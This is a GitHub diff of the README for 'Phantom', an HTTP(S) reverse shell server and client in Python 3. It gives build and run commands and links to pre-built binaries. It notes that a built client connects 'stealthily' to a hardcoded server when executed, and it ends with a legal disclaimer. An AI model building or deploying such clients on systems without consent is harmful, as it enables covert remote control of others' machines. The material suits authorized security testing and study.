|
1 | | -# Python 3 HTTPS Reverse Shell |
| 1 | +# Phantom - A multi-platform HTTP(S) Reverse Shell Server and Client |
2 | 2 |
|
3 | 3 |  |
4 | | -[](https://www.codefactor.io/repository/github/EONRaider/BCA-HTTPS-Reverse-Shell) |
| 4 | +[](https://www.codefactor.io/repository/github/EONRaider/BCA-Phantom) |
5 | 5 |  |
6 | 6 |  |
7 | 7 |
|
8 | 8 | [](https://www.reddit.com/user/eonraider) |
9 | 9 | [](https://discord.gg/KVjWBptv) |
10 | 10 | [](https://twitter.com/intent/follow?screen_name=eon_raider) |
11 | 11 |
|
12 | | -A **cross-platform HTTPS Reverse Shell** server and client in Python 3. Binaries for |
13 | | -Linux and Windows platforms can be built through an embedded script that implements |
| 12 | +Phantom is a **multi-platform HTTP(S) Reverse Shell** server and client in Python 3. Binaries for |
| 13 | +Linux and Windows platforms can be built through an embedded script that executes |
14 | 14 | PyInstaller. |
15 | 15 |
|
16 | | -This application also includes a helper shell script that enables fast generation of |
| 16 | +Reverse shells can be established through HTTP or HTTPS. The certificates used for |
| 17 | +HTTPS can be auto-generated by Phantom or supplied by the user. |
| 18 | + |
| 19 | +Phantom includes a helper shell script that enables fast generation of |
17 | 20 | self-signed certificates for use of both servers and clients. After generation, the |
18 | 21 | server and certificate authority certificates required for encrypted connections |
19 | 22 | are bundled in the binaries for portability and ease of execution. |
20 | 23 |
|
| 24 | +## Demo |
| 25 | + |
| 26 | + |
21 | 27 | ## Try it out! |
22 | | -If you just need to see the tool in action on a local environment, simply head over |
23 | | -to the [demo-files](https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell/tree/master/demo-files) |
24 | | -directory and download the pre-built Linux/Unix/macOS or Windows binaries. |
| 28 | +Simply head over to the [dist directory](https://github.com/EONRaider/BCA-Phantom/tree/master/dist) |
| 29 | +and download the pre-built Linux/Unix or Windows binaries. |
25 | 30 |
|
26 | | -The files are all bundled with certificates for `localhost` and work straight out-of-the-box. *Just |
27 | | -set them with permissions to execute and run.* |
| 31 | +The HTTP client files are set to connect to http://localhost:8080, whereas the HTTPS client bundles a CA certificate file for https://localhost:4443 and will |
| 32 | +only connect to this socket. With that in mind, choose either HTTP or HTTPS and run the server on one shell: |
| 33 | +```shell |
| 34 | +./linux_server http://localhost:8080 |
| 35 | + <-- or --> |
| 36 | +./linux_server https://localhost:4443 |
| 37 | +``` |
| 38 | +And the client on another one... |
| 39 | +```shell |
| 40 | +./http_linux_client |
| 41 | + <-- or --> |
| 42 | +./https_linux_client |
| 43 | +``` |
| 44 | +The same procedure works for the Windows binaries. |
| 45 | + |
| 46 | +## Setup |
| 47 | +### HTTP Server and Client |
| 48 | +*You don't need to set up the server and client for HTTP connections.* The server will |
| 49 | +work straight out-of-the-box and the client will connect to any HTTP server. Just [download |
| 50 | +the HTTP binaries from dist](https://github.com/EONRaider/BCA-Phantom/tree/master/dist) |
| 51 | +and you're done. Execute the binaries with the `--help` option for instructions. |
28 | 52 |
|
29 | | -## Build |
| 53 | +### HTTPS Server and Client |
30 | 54 | Encrypted communication through HTTPS requires at least two certificates: One for |
31 | 55 | the server, named `server.pem` by default, and another for the certificate authority, or `ca.pem`. |
32 | | -This HTTPS Reverse Shell bundles both files in binaries for fast deployment. They can be |
| 56 | +Phantom bundles both files in binaries for fast deployment. They can be |
33 | 57 | generated by [multiple methods](https://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs) |
34 | | -or by a simple execution of the [generate_certs.sh](https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell/blob/master/src/generate_certs.sh) helper script. |
| 58 | +or by a simple execution of the [generate_certs.sh](https://github.com/EONRaider/BCA-Phantom/blob/master/src/generate_certs.sh) helper script. |
35 | 59 |
|
36 | | -Once the certificates are ready you only need to (I) install the dependencies and (II) |
37 | | -run `build.py` to build the `server` and `client` binaries. |
| 60 | +Once the certificates are ready you only need to follow the steps from the [build](https://github.com/EONRaider/BCA-Phantom/tree/master#build) |
| 61 | +section below. |
38 | 62 |
|
| 63 | +## Build and Run an HTTPS Server/Client |
39 | 64 | ### I. Install Dependencies |
40 | 65 | Dependency management works with both [Poetry](https://python-poetry.org/) (recommended) |
41 | | -and [Virtualenv](https://virtualenv.pypa.io/en/latest/) |
| 66 | +and [Virtualenv](https://virtualenv.pypa.io/en/latest/). You need to install all |
| 67 | +dependencies before building binaries. |
42 | 68 | ```shell |
43 | | -git clone https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell.git |
44 | | -cd BCA-HTTPS-Reverse-Shell |
| 69 | +git clone https://github.com/EONRaider/BCA-Phantom.git |
| 70 | +cd BCA-Phantom |
45 | 71 | poetry install <--or--> pip install -r requirements.txt |
46 | 72 | ``` |
47 | 73 |
|
48 | | -### II. Build Server and Client binaries |
49 | | -The `build.py` file takes care of it all. |
50 | | -```shell |
51 | | -python build.py server --server-cert /path/to/server.pem |
52 | | -python build.py client --ca-cert /path/to/ca.pem |
53 | | -``` |
54 | | - |
55 | | -## Usage |
56 | | - |
57 | | - |
58 | | -## Development mode (optional) |
59 | | -You could optionally run the HTTPS Reverse Shell directly from a local Python 3 |
60 | | -interpreter. [Install all dependencies](https://github.com/EONRaider/BCA-HTTPS-Reverse-Shell/tree/master#i-install-dependencies) |
61 | | -and run the `server.py` and `client.py` files. All required certificates will be |
62 | | -automatically generated for `localhost`. |
63 | | - |
64 | | -Execute the **Server** on one shell... |
65 | | -```shell |
66 | | -python src/server/server.py localhost 4443 |
67 | | -``` |
68 | | - |
69 | | -... And the **Client** on another shell: |
70 | | -```shell |
71 | | -python src/client/client.py \ |
72 | | ---host localhost \ |
73 | | ---port 4443 \ |
74 | | ---ca-cert src/server/ca.pem |
75 | | -``` |
| 74 | +### II. Build HTTPS Server and Client binaries |
| 75 | +The `build.py` file centralizes the process and takes care of it all. Notice that |
| 76 | +a built Client binary contains a *hardcoded server URL*. **The connection to the server can |
| 77 | +be stealthily performed by simply executing the binary.** |
| 78 | +- Build and run the **Server** |
| 79 | + ```shell |
| 80 | + python build.py server --server-cert /path/to/server.pem |
| 81 | + ./linux_server SERVER_URL |
| 82 | + ``` |
| 83 | +- Build and run the **Client** |
| 84 | + ```shell |
| 85 | + python build.py client --url SERVER_URL --ca-cert /path/to/ca.pem |
| 86 | + ./https_linux_client |
| 87 | + ``` |
| 88 | +The same procedure works for the Windows binaries. |
76 | 89 |
|
77 | 90 | ## Legal Disclaimer |
78 | | - |
79 | 91 | The use of code contained in this repository, either in part or in its totality, |
80 | 92 | for engaging targets without prior mutual consent is illegal. **It is |
81 | 93 | the end user's responsibility to obey all applicable local, state and |
|
0 commit comments